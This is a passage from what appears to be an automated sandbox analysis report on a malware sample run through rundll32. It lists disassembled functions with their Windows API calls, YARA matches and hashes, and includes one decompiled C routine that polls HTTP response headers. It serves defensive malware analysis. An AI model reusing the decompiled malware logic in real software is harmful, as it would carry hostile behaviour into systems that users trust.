                            • RtlImageNtHeader.NTDLL(00000000), ref: 04F79532
                            • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 04F795F7
                              • Part of subcall function 04F6D4DA: lstrlen.KERNEL32(?,00000000,761B6980,00000000,04F6DA7B,?), ref: 04F6D4E3
                              • Part of subcall function 04F6D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 04F6D506
                              • Part of subcall function 04F6D4DA: memset.NTDLL ref: 04F6D515
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 04F795A8
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 04F795D7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                            • String ID:
                            • API String ID: 239510280-0
                            • Opcode ID: 1d00c9907d75e99fcb6417ece8645387fb7a01d6398613ea51d27e227a703d4d
                            • Instruction ID: 49b863bb336ae2058cbc1fc30fb212f926ce67fa1b94631b123cf3069e139c58
                            • Opcode Fuzzy Hash: 1d00c9907d75e99fcb6417ece8645387fb7a01d6398613ea51d27e227a703d4d
                            • Instruction Fuzzy Hash: 97418471B00219BBFB125F54EC45FAE7BA9EF44744F10406AF605AF180DBB9AE42D750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7D698 Relevance: 10.6, APIs: 7, Instructions: 126memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D6F2
                            • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D710
                            • RtlAllocateHeap.NTDLL(00000000,761B6985,?), ref: 04F7D73C
                            • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D753
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7D766
                            • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D775
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?), ref: 04F7D7D9
                              • Part of subcall function 04F6F307: RtlLeaveCriticalSection.NTDLL(?), ref: 04F6F384
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                            • String ID:
                            • API String ID: 1635816815-0
                            • Opcode ID: 97596961bb85f601f5e659775c94fba6062079b2fc9523f00a6027935dfc9c60
                            • Instruction ID: b8f41c825ef9ed072849312b702c81f2e02e4c431c48b65df399d54a9f64cf97
                            • Opcode Fuzzy Hash: 97596961bb85f601f5e659775c94fba6062079b2fc9523f00a6027935dfc9c60
                            • Instruction Fuzzy Hash: FB41A431A00219AFDF21AFA8DC84BAEBBB5EF04354F44456AF805AB150D778ED52DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7458D Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlImageNtHeader.NTDLL ref: 04F745B6
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F745F9
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F74614
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 04F7466A
                            • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 04F746C6
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 04F746D4
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F746DF
                              • Part of subcall function 04F626D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F626E7
                              • Part of subcall function 04F626D3: memcpy.NTDLL(00000000,?,?,?), ref: 04F62710
                              • Part of subcall function 04F626D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 04F62739
                              • Part of subcall function 04F626D3: RegCloseKey.ADVAPI32(?), ref: 04F62764
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                            • String ID:
                            • API String ID: 3181710096-0
                            • Opcode ID: 1f287ae006d77b95fd083cbb8dcaac6eaf4c02f3a36ccdee65d8a340bd9433e3
                            • Instruction ID: 8d95b9d34bde341211eb4ab5873a6e09dd54067c5cf0966c093b00f26639c6cc
                            • Opcode Fuzzy Hash: 1f287ae006d77b95fd083cbb8dcaac6eaf4c02f3a36ccdee65d8a340bd9433e3
                            • Instruction Fuzzy Hash: 17417F72A00209EBDB119F65EC88F7A7BA8FF44745F04402AF905DA150DB79ED42DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F81AAC Relevance: 10.6, APIs: 7, Instructions: 124threadstringCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 04F81AED
                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 04F81B1B
                            • GetWindowThreadProcessId.USER32(?,?), ref: 04F81B60
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04F81B88
                            • _strupr.NTDLL ref: 04F81BB3
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 04F81BC0
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 04F81BDA
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                            • String ID:
                            • API String ID: 3831658075-0
                            • Opcode ID: 4a5bb292ded357f6e578403dae0b5d57cbe689b13b985808ed9dccd30841558b
                            • Instruction ID: 31a3d61d7ce4a401aa911a23b67c7f90de7408fcd3a1c28fade292b7fbabf0d4
                            • Opcode Fuzzy Hash: 4a5bb292ded357f6e578403dae0b5d57cbe689b13b985808ed9dccd30841558b
                            • Instruction Fuzzy Hash: 8D414A72D0021DFBDF21AFA4DD45FEEBBB8EB48701F14455AE601AA150D7B4AA42CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F748FD Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 04F74943
                            • StrTrimA.SHLWAPI(?,?), ref: 04F74961
                            • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 04F749CA
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 04F749EB
                            • DeleteFileA.KERNEL32(?,00003219), ref: 04F74A0D
                            • HeapFree.KERNEL32(00000000,?), ref: 04F74A1C
                            • HeapFree.KERNEL32(00000000,?,00003219), ref: 04F74A34
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                            • String ID:
                            • API String ID: 1078934163-0
                            • Opcode ID: 252d32cca01a847d8c373f68ec7fee8037e700918eef13dafcb6977c74647ca9
                            • Instruction ID: af3b515aa54c8c6897a09e97e45d6ef54a9f5a218dc8295f1c5218fdd892ea70
                            • Opcode Fuzzy Hash: 252d32cca01a847d8c373f68ec7fee8037e700918eef13dafcb6977c74647ca9
                            • Instruction Fuzzy Hash: DA316D7260460AABE711EF54EC04F7A77E8EF45704F04045AFA44EF181D76DED0A9BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6E011 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,04F68478,00000000), ref: 04F6E02B
                            • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 04F6E040
                            • memset.NTDLL ref: 04F6E04D
                            • HeapFree.KERNEL32(00000000,00000000,?,04F68477,?,?,00000000,?,00000000,04F79CD0,?,00000000), ref: 04F6E06A
                            • memcpy.NTDLL(?,?,04F68477,?,04F68477,?,?,00000000,?,00000000,04F79CD0,?,00000000), ref: 04F6E08B
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Allocate$Freememcpymemset
                            • String ID: chun
                            • API String ID: 2362494589-3058818181
                            • Opcode ID: f8407f686308a976cb51ed37a440d705d6bf02ea8216ea4f9c805e66959e0e36
                            • Instruction ID: d84efc36370a3f270a91c8e5a5d9b8f2badc9232cf3b8d23936de3f64a6a503f
                            • Opcode Fuzzy Hash: f8407f686308a976cb51ed37a440d705d6bf02ea8216ea4f9c805e66959e0e36
                            • Instruction Fuzzy Hash: 1B318076600705AFD7318F65DC44A66BBE9EF44314F00842AF94ACB620D734F906DF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A14A85 Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A14A85(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04A16D63(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E04A16C2C(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04A16E40( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                            0x04a14a85
                            0x04a14a85
                            0x04a14a95
                            0x04a14a98
                            0x04a14a9c
                            0x04a14aa2
                            0x04a14aa7
                            0x04a14ac0
                            0x04a14ad4
                            0x04a14adb
                            0x04a14ae2
                            0x04a14b35
                            0x04a14b3b
                            0x04a14b41
                            0x04a14b7c
                            0x04a14b82
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a14b41
                            0x04a14ae8
                            0x00000000
                            0x04a14aef
                            0x04a14afd
                            0x04a14b00
                            0x04a14b03
                            0x04a14b0f
                            0x04a14b13
                            0x04a14b75
                            0x04a14b15
                            0x04a14b27
                            0x04a14b65
                            0x04a14b70
                            0x04a14b29
                            0x04a14b2c
                            0x04a14b30
                            0x04a14b30
                            0x04a14b27
                            0x00000000
                            0x04a14b13
                            0x04a14ae8
                            0x04a14aac
                            0x04a14ab2
                            0x04a14ab5
                            0x04a14aba
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a14b4a
                            0x04a14b52
                            0x04a14b57
                            0x04a14b5a
                            0x00000000

                            APIs
                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,761F81D0,00000000,00000000), ref: 04A14A9C
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,04A1593D,00000000,?), ref: 04A14AAC
                            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04A14ADE
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A14B03
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A14B23
                            • GetLastError.KERNEL32 ref: 04A14B35
                              • Part of subcall function 04A16E40: WaitForMultipleObjects.KERNEL32(00000002,04A17BB5,00000000,04A17BB5,?,?,?,04A17BB5,0000EA60), ref: 04A16E5B
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • GetLastError.KERNEL32(00000000), ref: 04A14B6A
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                            • String ID:
                            • API String ID: 3369646462-0
                            • Opcode ID: d33ac3f4d16d09acd7f94656e079276b77fd3fa67a17125fa9d6f2313d6ce0f0
                            • Instruction ID: 1e19cb29ad49c04caf6ba51a2dedda8ab7b91caa1cca6ed27bcde3a82dea4152
                            • Opcode Fuzzy Hash: d33ac3f4d16d09acd7f94656e079276b77fd3fa67a17125fa9d6f2313d6ce0f0
                            • Instruction Fuzzy Hash: 51312CB5904309EFEB20DFE9CC84E9EBBB8EB1C300F10496AE542E2160D775AA45DF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F68EAF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 04F68ED3
                              • Part of subcall function 04F6A5E7: lstrlen.KERNEL32(00000000,7620F730,-00000001,00000000,?,?,?,04F68EF7,?,00000000,000000FF), ref: 04F6A5F8
                              • Part of subcall function 04F6A5E7: lstrlen.KERNEL32(?,?,?,?,04F68EF7,?,00000000,000000FF), ref: 04F6A5FF
                              • Part of subcall function 04F6A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 04F6A611
                              • Part of subcall function 04F6A5E7: _snprintf.NTDLL ref: 04F6A637
                              • Part of subcall function 04F6A5E7: _snprintf.NTDLL ref: 04F6A66B
                              • Part of subcall function 04F6A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 04F6A688
                            • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 04F68F6D
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 04F68F8A
                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 04F68F92
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 04F68FA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                            • String ID: s:
                            • API String ID: 2960378068-2363032815
                            • Opcode ID: f6676ff0a69547d6b206fc0b3ced361a91f3176431daadac917cf695ee1bbe8e
                            • Instruction ID: 0a6fcca8d9bd93c88eb513e5655eb0bc8b9afb58ea751925547c412c905bfe3b
                            • Opcode Fuzzy Hash: f6676ff0a69547d6b206fc0b3ced361a91f3176431daadac917cf695ee1bbe8e
                            • Instruction Fuzzy Hash: DA312F72A00249BFDB10AFE9DC84FAE7BBCEB09355F04055DB605EA141E674BA058B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F613E0 Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 04F613F6
                            • lstrcmpiW.KERNEL32(00000000,?), ref: 04F6142E
                            • lstrcmpiW.KERNEL32(?,?), ref: 04F61443
                            • lstrlenW.KERNEL32(?), ref: 04F6144A
                            • CloseHandle.KERNEL32(?), ref: 04F61472
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 04F6149E
                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04F614BC
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                            • String ID:
                            • API String ID: 1496873005-0
                            • Opcode ID: 680013ec03b3d211b9d68036e173a7dbed804162711529c8cec34f0b52ce9e73
                            • Instruction ID: b814a4af8af3466039a247888661f2ee345b5914dabd23d53c8ef655945286fd
                            • Opcode Fuzzy Hash: 680013ec03b3d211b9d68036e173a7dbed804162711529c8cec34f0b52ce9e73
                            • Instruction Fuzzy Hash: F82133B1A0060ABFDB109F75ED84E6B77BCEF05644B154569A902EB100D739ED069B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6F7F2 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(04F6F67C,00000000,04F8A420,04F8A440,?,?,04F6F67C,04F7E453,04F8A420), ref: 04F6F802
                            • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04F6F818
                            • lstrlen.KERNEL32(04F7E453,?,?,04F6F67C,04F7E453,04F8A420), ref: 04F6F820
                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F6F82C
                            • lstrcpy.KERNEL32(04F8A420,04F6F67C), ref: 04F6F842
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F6F67C,04F7E453,04F8A420), ref: 04F6F896
                            • HeapFree.KERNEL32(00000000,04F8A420,?,?,04F6F67C,04F7E453,04F8A420), ref: 04F6F8A5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrlen$lstrcpy
                            • String ID:
                            • API String ID: 1531811622-0
                            • Opcode ID: 7d715d8466f04396f85a6b0b52a0cf8c07ffc58976f1fc47bc9af2c82aeb27b6
                            • Instruction ID: 642f26634fe2ae0ddf7a1c9126bc5eeb25f120aeb7f5cd5e99593c3e5dc33db7
                            • Opcode Fuzzy Hash: 7d715d8466f04396f85a6b0b52a0cf8c07ffc58976f1fc47bc9af2c82aeb27b6
                            • Instruction Fuzzy Hash: 0621C531A04249BFEB124F68FC44F7A7FA6EB46354F144099E8599B211C775AC06D7B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F813B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,04F70E77,00000000), ref: 04F813DA
                              • Part of subcall function 04F73193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 04F731CD
                              • Part of subcall function 04F73193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,04F813E7,?,?,00000000,?,04F70E77,00000000), ref: 04F731DF
                              • Part of subcall function 04F73193: GetTickCount.KERNEL32 ref: 04F731EA
                              • Part of subcall function 04F73193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,04F813E7,?,?,00000000,?,04F70E77,00000000), ref: 04F731F6
                              • Part of subcall function 04F73193: lstrcpy.KERNEL32(00000000), ref: 04F73210
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(00000000), ref: 04F81415
                            • wsprintfA.USER32 ref: 04F81428
                            • GetTickCount.KERNEL32 ref: 04F8143D
                            • wsprintfA.USER32 ref: 04F81452
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                            • String ID: "%S"
                            • API String ID: 1152860224-1359967185
                            • Opcode ID: 1464298ba0f61541c0b025d64c1973b152aa0d57b6e6424c93c515ba5150991f
                            • Instruction ID: 39169ba51d47d9a668f93070bc0364834dbdb743b10deedbaee5be256a94e47a
                            • Opcode Fuzzy Hash: 1464298ba0f61541c0b025d64c1973b152aa0d57b6e6424c93c515ba5150991f
                            • Instruction Fuzzy Hash: 1511B1B2A01219BFE200BBA4ED48E6F379CDF85254B05445AF9459B201DA7CFC068BB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6977C Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,761B5520,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F7509E
                              • Part of subcall function 04F7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750B7
                              • Part of subcall function 04F7508C: GetCurrentThreadId.KERNEL32 ref: 04F750C4
                              • Part of subcall function 04F7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750D0
                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,04F6314A,00000000), ref: 04F697BD
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,04F6314A,00000000,00000000,00000004,?,00000000,?), ref: 04F69830
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                            • String ID:
                            • API String ID: 2078930461-0
                            • Opcode ID: 511769392f4105a9f9c749f79df19201b04be1e77f1b4dc7324faf4c919a392f
                            • Instruction ID: f83821821889448a9cdedceae57b4e08e0cfd2715d021c51d66d73e0726a42fc
                            • Opcode Fuzzy Hash: 511769392f4105a9f9c749f79df19201b04be1e77f1b4dc7324faf4c919a392f
                            • Instruction Fuzzy Hash: 95110172540319BBD7212E31BC48F7F3F9CEB05765F00012AF606A9180D6BA6C5ADAE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7EA15 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7358E: lstrlen.KERNEL32(00000000,00000000,761F81D0,7749EEF0,?,?,?,04F7EA2E,?,761B5520,7749EEF0,?,00000000,04F6E842,00000000,0631C310), ref: 04F735F5
                              • Part of subcall function 04F7358E: sprintf.NTDLL ref: 04F73616
                            • lstrlen.KERNEL32(00000000,761F81D0,?,761B5520,7749EEF0,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA40
                            • lstrlen.KERNEL32(?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA48
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • strcpy.NTDLL ref: 04F7EA5F
                            • lstrcat.KERNEL32(00000000,?), ref: 04F7EA6A
                              • Part of subcall function 04F7C32E: lstrlen.KERNEL32(?,?,?,00000000,?,04F7EA79,00000000,?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7C33F
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA87
                              • Part of subcall function 04F6930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04F7EA93,00000000,?,00000000,04F6E842,00000000,0631C310), ref: 04F69316
                              • Part of subcall function 04F6930C: _snprintf.NTDLL ref: 04F69374
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                            • String ID: =
                            • API String ID: 2864389247-1428090586
                            • Opcode ID: 77a4583ba288050ecb58276a62ce04f2353f2bb31379f9791021c4710bab86f4
                            • Instruction ID: 4ca25dae9a4d95b566130bf562c622aa99c61c65c132c17559e7215d997a8300
